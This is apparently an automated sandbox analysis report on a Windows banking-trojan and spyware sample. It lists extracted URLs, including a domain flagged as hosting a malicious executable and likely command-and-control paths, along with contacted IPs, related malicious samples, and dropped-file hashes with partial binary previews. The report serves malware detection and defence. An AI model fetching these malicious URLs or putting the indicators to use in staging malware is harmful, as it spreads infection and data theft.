                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://www.youtube.com1E1C360C582DF797.exefalse
                                                                                        		high
                                                                                        https://twitter.com/compose/tweetsec-fetch-dest:1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          https://www.instagram.com/1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://EF6DF4AF06BA6896.xyz/dbo1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://www.sodown.xyz/index.exe1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmp, 1E1C360C582DF797.exe, 00000015.00000003.655265366.00000000026C0000.00000040.00000001.sdmptrue
                                                                                              • Avira URL Cloud: malware
                                                                                              		unknown
                                                                                              https://api.twitter.com/1.1/statuses/update.jsoninclude_profile_interstitial_type=1&include_blocking1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://www.messenger.com/origin:1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    https://1C5491A87D65F1EF.club/1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sh1GodtbhC8.exe, 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.drfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://nsis.sf.net/NSIS_ErrorErrorh1GodtbhC8.exefalse
                                                                                                        		high
                                                                                                        https://twitter.com/1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          https://api.twitter.com/1.1/statuses/update.json1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            https://upload.twitter.com/i/media/upload.json1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              https://ac.ecosia.org/autocomplete?q=1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0th1GodtbhC8.exe, 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.drfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://twitter.com/compose/tweetsec-fetch-mode:1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://nsis.sf.net/NSIS_Erroraliens.exe, aliens.exe, 00000004.00000002.627075353.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 00000015.00000002.825159947.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 00000019.00000000.617074635.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe.4.drfalse
                                                                                                                    		high
                                                                                                                    http://EF6DF4AF06BA6896.xyz/info/g1E1C360C582DF797.exe, 00000015.00000003.574995047.0000000005D4C000.00000004.00000001.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      http://EF6DF4AF06BA6896.xyz/info/r1E1C360C582DF797.exe, 00000015.00000003.574894827.0000000002559000.00000004.00000001.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://1C5491A87D65F1EF.club/Info_t/up1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      http://crl.usertrust.1E1C360C582DF797.exe, 00000015.00000003.582989815.0000000005D44000.00000004.00000001.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#h1GodtbhC8.exe, 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.drfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://EF6DF4AF06BA6896.xyz/info/dddi_u1E1C360C582DF797.exe, 00000015.00000002.827057199.0000000004150000.00000004.00000040.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://www.messenger.com/accept:1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://EF6DF4AF06BA6896.xyz/1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          http://ocsp.usertrus1E1C360C582DF797.exe, 00000015.00000003.582989815.0000000005D44000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=01E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://feedback.googleusercontent.com1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                http://www.sodown.xyz/in1E1C360C582DF797.exe, 00000015.00000002.824956152.0000000000196000.00000004.00000001.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmpfalse
                                                                                                                                  		high

                                                                                                                                  Contacted IPs

                                                                                                                                  • No. of IPs < 25%
                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                  • 75% < No. of IPs

                                                                                                                                  Public

                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                  172.67.142.39
                                                                                                                                  		unknownUnited States
                                                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                                                  104.28.4.129
                                                                                                                                  		unknownUnited States
                                                                                                                                  		13335CLOUDFLARENETUSfalse

                                                                                                                                  Private

                                                                                                                                  IP
                                                                                                                                  192.168.2.1
                                                                                                                                  127.0.0.1

                                                                                                                                  General Information

                                                                                                                                  Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                  Analysis ID:327203
                                                                                                                                  Start date:05.12.2020
                                                                                                                                  Start time:08:39:26
                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                  Overall analysis duration:0h 16m 19s
                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                  Report type:light
                                                                                                                                  Sample file name:h1GodtbhC8.exe
                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                  Run name:Run with higher sleep bypass
                                                                                                                                  Number of analysed new started processes analysed:40
                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                  Technologies:
                                                                                                                                  • HCA enabled
                                                                                                                                  • EGA enabled
                                                                                                                                  • HDC enabled
                                                                                                                                  • AMSI enabled
                                                                                                                                  Analysis Mode:default
                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                  Detection:MAL
                                                                                                                                  Classification:mal100.bank.troj.spyw.evad.winEXE@31/50@223/4
                                                                                                                                  EGA Information:Failed
                                                                                                                                  HDC Information:
                                                                                                                                  • Successful, ratio: 36.9% (good quality ratio 35.7%)
                                                                                                                                  • Quality average: 79.9%
                                                                                                                                  • Quality standard deviation: 25.4%
                                                                                                                                  HCA Information:Failed
                                                                                                                                  Cookbook Comments:
                                                                                                                                  • Adjust boot time
                                                                                                                                  • Enable AMSI
                                                                                                                                  • Sleeps bigger than 120000ms are automatically reduced to 1000ms
                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                  Warnings:
                                                                                                                                  Show All
                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                                                                                                                  • TCP Packets have been reduced to 100
                                                                                                                                  • Excluded IPs from analysis (whitelisted): 13.88.21.125, 40.88.32.150, 92.122.144.200, 51.104.139.180, 2.20.142.209, 2.20.142.210, 92.122.213.247, 92.122.213.194, 20.54.26.129, 51.11.168.160, 52.155.217.156, 104.83.120.32, 40.126.1.142, 20.190.129.24, 20.190.129.160, 20.190.129.19, 40.126.1.166, 20.190.129.17, 20.190.129.133, 40.126.1.145, 93.184.220.29, 168.61.161.212, 152.199.19.161, 20.190.129.130, 40.126.1.130, 20.190.129.2, 51.104.136.2
                                                                                                                                  • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, cs9.wac.phicdn.net, www.tm.lg.prod.aadmsa.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, www.tm.a.prd.aadg.trafficmanager.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, skypedataprdcoleus15.cloudapp.net, go.microsoft.com, ocsp.digicert.com, login.live.com, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, ie9comview.vo.msecnd.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus17.cloudapp.net, settings-win.data.microsoft.com, a767.dscg3.akamai.net, login.msa.msidentity.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, dub2.current.a.prd.aadg.trafficmanager.net, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus15.cloudapp.net, cs9.wpc.v0cdn.net
                                                                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                  Simulations

                                                                                                                                  Behavior and APIs

                                                                                                                                  No simulations

                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                  IPs

                                                                                                                                  No context

                                                                                                                                  Domains

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                  iplogger.orgYzvGNYMkTT.exeGet hashmaliciousBrowse
                                                                                                                                  • 88.99.66.31
                                                                                                                                  zeppelin.exeGet hashmaliciousBrowse
                                                                                                                                  • 88.99.66.31
                                                                                                                                  6GwRAlSS4F.exeGet hashmaliciousBrowse
                                                                                                                                  • 88.99.66.31
                                                                                                                                  Hlxj8nfBay.exeGet hashmaliciousBrowse
                                                                                                                                  • 88.99.66.31
                                                                                                                                  7z6cDuH7Md.exeGet hashmaliciousBrowse
                                                                                                                                  • 88.99.66.31
                                                                                                                                  cpMHTTwNC1.exeGet hashmaliciousBrowse
                                                                                                                                  • 88.99.66.31
                                                                                                                                  IaGdBpfkmV.exeGet hashmaliciousBrowse
                                                                                                                                  • 88.99.66.31
                                                                                                                                  A5RsEkXArf.exeGet hashmaliciousBrowse
                                                                                                                                  • 88.99.66.31
                                                                                                                                  KeJ7Cl7flZ.exeGet hashmaliciousBrowse
                                                                                                                                  • 88.99.66.31
                                                                                                                                  XC65ED9or6.exeGet hashmaliciousBrowse
                                                                                                                                  • 88.99.66.31
                                                                                                                                  cli.exeGet hashmaliciousBrowse
                                                                                                                                  • 88.99.66.31
                                                                                                                                  R7w74RKW9A.exeGet hashmaliciousBrowse
                                                                                                                                  • 88.99.66.31
                                                                                                                                  pqSZtQiuRy.exeGet hashmaliciousBrowse
                                                                                                                                  • 88.99.66.31
                                                                                                                                  a3d224d6da883da2d8ba5671ab64ed24.exeGet hashmaliciousBrowse
                                                                                                                                  • 88.99.66.31
                                                                                                                                  a3d224d6da883da2d8ba5671ab64ed24.exeGet hashmaliciousBrowse
                                                                                                                                  • 88.99.66.31
                                                                                                                                  SecuriteInfo.com.ArtemisE8B534F89B0F.exeGet hashmaliciousBrowse
                                                                                                                                  • 88.99.66.31
                                                                                                                                  SecuriteInfo.com.Trojan.PWS.Siggen2.59718.4609.exeGet hashmaliciousBrowse
                                                                                                                                  • 88.99.66.31
                                                                                                                                  SecuriteInfo.com.Trojan.PWS.Siggen2.59485.31175.exeGet hashmaliciousBrowse
                                                                                                                                  • 88.99.66.31
                                                                                                                                  2rYTU7Mzo9.exeGet hashmaliciousBrowse
                                                                                                                                  • 88.99.66.31
                                                                                                                                  3MndTUzGQn.exeGet hashmaliciousBrowse
                                                                                                                                  • 88.99.66.31
                                                                                                                                  EF6DF4AF06BA6896.xyzh1GodtbhC8.exeGet hashmaliciousBrowse
                                                                                                                                  • 172.67.194.30

                                                                                                                                  ASN

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                  CLOUDFLARENETUSh1GodtbhC8.exeGet hashmaliciousBrowse
                                                                                                                                  • 172.67.194.30
                                                                                                                                  OncoImmune.xlsxGet hashmaliciousBrowse
                                                                                                                                  • 104.16.19.94
                                                                                                                                  SecuriteInfo.com.Trojan.DownLoader36.26314.8898.exeGet hashmaliciousBrowse
                                                                                                                                  • 162.159.138.232
                                                                                                                                  SecuriteInfo.com.Trojan.InjectNET.14.12461.exeGet hashmaliciousBrowse
                                                                                                                                  • 172.67.188.154
                                                                                                                                  https://healtymed.com/ADOBE.htmlGet hashmaliciousBrowse
                                                                                                                                  • 104.18.44.229
                                                                                                                                  SecuriteInfo.com.Generic.mg.40a8bc3e38349e37.exeGet hashmaliciousBrowse
                                                                                                                                  • 104.31.85.117
                                                                                                                                  http://test.kunmiskincare.com/index.phpGet hashmaliciousBrowse
                                                                                                                                  • 104.18.22.230
                                                                                                                                  Stolen_Images_Evidence.jsGet hashmaliciousBrowse
                                                                                                                                  • 104.18.43.92
                                                                                                                                  https://nursing-theory.org/nursing-theorists/Isabel-Hampton-Robb.phpGet hashmaliciousBrowse
                                                                                                                                  • 172.67.13.182
                                                                                                                                  dor001.exeGet hashmaliciousBrowse
                                                                                                                                  • 23.227.38.74
                                                                                                                                  SHIPPING.EXEGet hashmaliciousBrowse
                                                                                                                                  • 172.67.160.246
                                                                                                                                  SKY POUNDS.exeGet hashmaliciousBrowse
                                                                                                                                  • 104.24.127.89
                                                                                                                                  https://www.samsungsds.com/us/en/solutions/bns/high-performance-computing/hpc-managed-services.htmlGet hashmaliciousBrowse
                                                                                                                                  • 104.26.7.139
                                                                                                                                  Documento de transferencia de Scotiabank7497574730084doc.exeGet hashmaliciousBrowse
                                                                                                                                  • 172.67.143.180
                                                                                                                                  Document N0-BR1702Q667420_12.exeGet hashmaliciousBrowse
                                                                                                                                  • 172.67.143.180
                                                                                                                                  proforma invoice5087713.xlsGet hashmaliciousBrowse
                                                                                                                                  • 104.28.4.151
                                                                                                                                  mCiZXEeKax.exeGet hashmaliciousBrowse
                                                                                                                                  • 104.18.53.69
                                                                                                                                  OKx5tyuiLx.exeGet hashmaliciousBrowse
                                                                                                                                  • 104.26.2.232
                                                                                                                                  RFQ.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.159.135.232
                                                                                                                                  https://maxhealth-conm.cf/?login=doGet hashmaliciousBrowse
                                                                                                                                  • 104.16.19.94
                                                                                                                                  CLOUDFLARENETUSh1GodtbhC8.exeGet hashmaliciousBrowse
                                                                                                                                  • 172.67.194.30
                                                                                                                                  OncoImmune.xlsxGet hashmaliciousBrowse
                                                                                                                                  • 104.16.19.94
                                                                                                                                  SecuriteInfo.com.Trojan.DownLoader36.26314.8898.exeGet hashmaliciousBrowse
                                                                                                                                  • 162.159.138.232
                                                                                                                                  SecuriteInfo.com.Trojan.InjectNET.14.12461.exeGet hashmaliciousBrowse
                                                                                                                                  • 172.67.188.154
                                                                                                                                  https://healtymed.com/ADOBE.htmlGet hashmaliciousBrowse
                                                                                                                                  • 104.18.44.229
                                                                                                                                  SecuriteInfo.com.Generic.mg.40a8bc3e38349e37.exeGet hashmaliciousBrowse
                                                                                                                                  • 104.31.85.117
                                                                                                                                  http://test.kunmiskincare.com/index.phpGet hashmaliciousBrowse
                                                                                                                                  • 104.18.22.230
                                                                                                                                  Stolen_Images_Evidence.jsGet hashmaliciousBrowse
                                                                                                                                  • 104.18.43.92
                                                                                                                                  https://nursing-theory.org/nursing-theorists/Isabel-Hampton-Robb.phpGet hashmaliciousBrowse
                                                                                                                                  • 172.67.13.182
                                                                                                                                  dor001.exeGet hashmaliciousBrowse
                                                                                                                                  • 23.227.38.74
                                                                                                                                  SHIPPING.EXEGet hashmaliciousBrowse
                                                                                                                                  • 172.67.160.246
                                                                                                                                  SKY POUNDS.exeGet hashmaliciousBrowse
                                                                                                                                  • 104.24.127.89
                                                                                                                                  https://www.samsungsds.com/us/en/solutions/bns/high-performance-computing/hpc-managed-services.htmlGet hashmaliciousBrowse
                                                                                                                                  • 104.26.7.139
                                                                                                                                  Documento de transferencia de Scotiabank7497574730084doc.exeGet hashmaliciousBrowse
                                                                                                                                  • 172.67.143.180
                                                                                                                                  Document N0-BR1702Q667420_12.exeGet hashmaliciousBrowse
                                                                                                                                  • 172.67.143.180
                                                                                                                                  proforma invoice5087713.xlsGet hashmaliciousBrowse
                                                                                                                                  • 104.28.4.151
                                                                                                                                  mCiZXEeKax.exeGet hashmaliciousBrowse
                                                                                                                                  • 104.18.53.69
                                                                                                                                  OKx5tyuiLx.exeGet hashmaliciousBrowse
                                                                                                                                  • 104.26.2.232
                                                                                                                                  RFQ.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.159.135.232
                                                                                                                                  https://maxhealth-conm.cf/?login=doGet hashmaliciousBrowse
                                                                                                                                  • 104.16.19.94

                                                                                                                                  JA3 Fingerprints

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                  ce5f3254611a8c095a3d821d44539877mCiZXEeKax.exeGet hashmaliciousBrowse
                                                                                                                                  • 172.67.142.39
                                                                                                                                  nd2fpgcp.dllGet hashmaliciousBrowse
                                                                                                                                  • 172.67.142.39
                                                                                                                                  d60iis2l.dllGet hashmaliciousBrowse
                                                                                                                                  • 172.67.142.39
                                                                                                                                  2ndgr.msiGet hashmaliciousBrowse
                                                                                                                                  • 172.67.142.39
                                                                                                                                  mediasvc copy.dllGet hashmaliciousBrowse
                                                                                                                                  • 172.67.142.39
                                                                                                                                  usz.exeGet hashmaliciousBrowse
                                                                                                                                  • 172.67.142.39
                                                                                                                                  2020-12-03_08-45-45.exe.exeGet hashmaliciousBrowse
                                                                                                                                  • 172.67.142.39
                                                                                                                                  20-091232.xlsxGet hashmaliciousBrowse
                                                                                                                                  • 172.67.142.39
                                                                                                                                  ipsjz17z.dllGet hashmaliciousBrowse
                                                                                                                                  • 172.67.142.39
                                                                                                                                  uzutwotm.exeGet hashmaliciousBrowse
                                                                                                                                  • 172.67.142.39
                                                                                                                                  q9y42trS7z.exeGet hashmaliciousBrowse
                                                                                                                                  • 172.67.142.39
                                                                                                                                  IaGdBpfkmV.exeGet hashmaliciousBrowse
                                                                                                                                  • 172.67.142.39
                                                                                                                                  Vuu0hnOqjF.exeGet hashmaliciousBrowse
                                                                                                                                  • 172.67.142.39
                                                                                                                                  Eptinaub3.dllGet hashmaliciousBrowse
                                                                                                                                  • 172.67.142.39
                                                                                                                                  otaxujuc64.dllGet hashmaliciousBrowse
                                                                                                                                  • 172.67.142.39
                                                                                                                                  Donorcasino.dllGet hashmaliciousBrowse
                                                                                                                                  • 172.67.142.39
                                                                                                                                  Visitreflect.dllGet hashmaliciousBrowse
                                                                                                                                  • 172.67.142.39
                                                                                                                                  Lijocn.dllGet hashmaliciousBrowse
                                                                                                                                  • 172.67.142.39
                                                                                                                                  MT103---USD42,880.45---20201127--dbs--9900.exeGet hashmaliciousBrowse
                                                                                                                                  • 172.67.142.39
                                                                                                                                  KeJ7Cl7flZ.exeGet hashmaliciousBrowse
                                                                                                                                  • 172.67.142.39

                                                                                                                                  Dropped Files

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                  C:\Program Files (x86)\71eza90awf48\aliens.exeh1GodtbhC8.exeGet hashmaliciousBrowse
                                                                                                                                    C:\Users\user\AppData\Local\Temp\nsqEF29.tmp\Sibuia.dllh1GodtbhC8.exeGet hashmaliciousBrowse
                                                                                                                                      KeJ7Cl7flZ.exeGet hashmaliciousBrowse
                                                                                                                                        C:\ProgramData\sib\{7C999AAA-0000-487E-97BD-7619B45532F4}\SibClr.dllh1GodtbhC8.exeGet hashmaliciousBrowse
                                                                                                                                          KeJ7Cl7flZ.exeGet hashmaliciousBrowse
                                                                                                                                            C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\SibClr.dllh1GodtbhC8.exeGet hashmaliciousBrowse
                                                                                                                                              KeJ7Cl7flZ.exeGet hashmaliciousBrowse
                                                                                                                                                C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeh1GodtbhC8.exeGet hashmaliciousBrowse

                                                                                                                                                  Created / dropped Files

                                                                                                                                                  C:\Program Files (x86)\71eza90awf48\aliens.exe
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):506545472
                                                                                                                                                  Entropy (8bit):0.13665136586177498
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:
                                                                                                                                                  MD5:87698F069716708B6743A580B1D0D0CC
                                                                                                                                                  SHA1:6E8585C0596C41CEAF1EEA7E8AEEFF3393A4F126
                                                                                                                                                  SHA-256:6781F617A3F74D85AC7113828B2BE7D0186E32259FD6B4C10E18C6233CB97549
                                                                                                                                                  SHA-512:B92564EB4995FD6637F8EAECD6AAC285C8527DECEDF21D423491F98040962ABACFA4F27977E43DA7ED8DCF4B190156DA5EFAF146E2DD76FB0E51D77476F65D3E
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                  • Filename: h1GodtbhC8.exe, Detection: malicious, Browse
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: MZ......................@............................................@.....3.!This program cannot be run in DOS mode....$.......g.&.#aH.#aH.#aH..?L.%aH.N<N. aH.N<I.,aH.#aI..aH..?L.(aH..?.."aH..?J."aH.Rich#aH.........................PE..L....sQY.................v....... .. 9............@.................................Ti....@.............................................0...........l..89..........p...T..............................@............................................text...bt.......v.................. ....rdata..(#.......$...z..............@..@.data...............................@....ndata... ...`...........................rsrc....0.......2..................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\ProgramData\sib\{7C999AAA-0000-487E-97BD-7619B45532F4}\SibCa.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\h1GodtbhC8.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):4096
                                                                                                                                                  Entropy (8bit):6.867501832742936
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:PAWqGuIO1w7JElw764ulqk4uWdCXufAx8Su2yk:oWaIO1S7ulqBhv+yk
                                                                                                                                                  MD5:04F3C7753A4FCABCE7970BFA3B5C76FF
                                                                                                                                                  SHA1:34FC37D42F86DAC1FD1171A806471CDFEAE9817B
                                                                                                                                                  SHA-256:A735E33A420C2AD93279253BC57137947B5D07803FF438499AAAF6FD0692F4CD
                                                                                                                                                  SHA-512:F774FC3F3EBF029DC6F122669060351CC58AE27C5224ABE2A6C8AB1308C4B796657D2F286760EB73A2AE7563EEEF335DAA70ED5E4B2560D34CA9873017658AFE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ..MZ.........0......8-..@.8.0..p.........!...L.!This. program. cannot .be run i.n DOS mo.de....$...PE..L....d82........!..0............. ..B................... ...........@..*..-......#......`....O...+h..........(.Q..........8W.....O......HA...text..........u.[.......`.rsrc...M;.}.t.......@.0relo...U..)......B.......5...&......S..4o.......F.......s....(.....*..(....{.%...{.9....[...4.*..(".....}...."}A...}....D.}..6..B.(...+**D...* 6..si.......*...0.....,....(.....~......oRj..*&.....N"(@M.-...on.A..0......!H.(...o...."r..p(...(.E..r@.po.@.....o..........%.B.....(.@........o...&..% ....o.x......u...,..B...o!..B!....!...~...Tu.."..[......#E..8...o"..$Q ....c..o....*..*..`......IT..G.:. `....@;.`.0...`. 5.@.r?..pB1..s#.....A.R.%.r..p.%.DrW...%..*rFq .b*..s....%.o%@.%.oB&....o'...Do(..........o)......"o.>.o+..,oE..,a..+?.,-.@.t.7.a-%o......Yo/.../.o.].....-...r..../. #"...1..-......u.>....., ...o2......#...>....L....X..a"0.$..V..h".r..."3a..r.`.rZ@..p.(4 ....+!rh..c.B..r...po..D.U.*..*.
                                                                                                                                                  C:\ProgramData\sib\{7C999AAA-0000-487E-97BD-7619B45532F4}\SibClr.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\h1GodtbhC8.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):52520
                                                                                                                                                  Entropy (8bit):6.011934677477037
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:9GyM4uxlvOe/c1xpfLIa97v3A5KobiPWh:9G1vt/g7fLb97Y5VmY
                                                                                                                                                  MD5:928E680DEA22C19FEBE9FC8E05D96472
                                                                                                                                                  SHA1:0A4A749DDFD220E2B646B878881575FF9352CF73
